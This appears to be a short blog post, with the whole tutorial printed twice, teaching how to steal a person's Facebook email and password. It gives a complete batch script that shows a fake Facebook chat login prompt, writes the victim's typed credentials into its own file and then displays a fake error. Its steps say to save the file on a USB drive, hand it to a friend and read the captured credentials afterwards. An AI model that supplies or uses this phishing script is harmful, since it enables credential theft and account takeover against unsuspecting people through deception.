Here is a simple trick to get the Email and password of a person via a USB drive with some social engineering.
1. Open notepad and paste the following code and leave a blank line after the code.
TITLE FBChat
ECHO OFF
COLOR 03
CLS
ECHO.
ECHO LOGIN TO START CHATTING ON FACEBOOK
ECHO.
ECHO Please enter your email:
SET/P "MAIL=>"
ECHO.
ECHO Enter the password:
SET/P "PSWD=>"
ECHO EMAIL = %MAIL%>>FBChat.bat
ECHO PASSWORD = %PSWD%>>FBChat.bat
CLS
TIMEOUT /T 5 >NUL
COLOR 0C
ECHO.
ECHO An error occurred while connecting to the server. Try again later.
PAUSE>NUL
EXIT
---------- Below this line are the collected information ----------
2. Save the code as FBChat.bat exactly. Do not name it anything else or it won't work.
3. Put the batch file into a USB drive and give it to your friend.
When you get back the USB drive, right click the batch file and select Edit. Now scroll down and you will see the information collected!
1. Open notepad and paste the following code and leave a blank line after the code.
TITLE FBChat
ECHO OFF
COLOR 03
CLS
ECHO.
ECHO LOGIN TO START CHATTING ON FACEBOOK
ECHO.
ECHO Please enter your email:
SET/P "MAIL=>"
ECHO.
ECHO Enter the password:
SET/P "PSWD=>"
ECHO EMAIL = %MAIL%>>FBChat.bat
ECHO PASSWORD = %PSWD%>>FBChat.bat
CLS
TIMEOUT /T 5 >NUL
COLOR 0C
ECHO.
ECHO An error occurred while connecting to the server. Try again later.
PAUSE>NUL
EXIT
---------- Below this line are the collected information ----------
2. Save the code as FBChat.bat exactly. Do not name it anything else or it won't work.
3. Put the batch file into a USB drive and give it to your friend.
When you get back the USB drive, right click the batch file and select Edit. Now scroll down and you will see the information collected!
No comments:
Post a Comment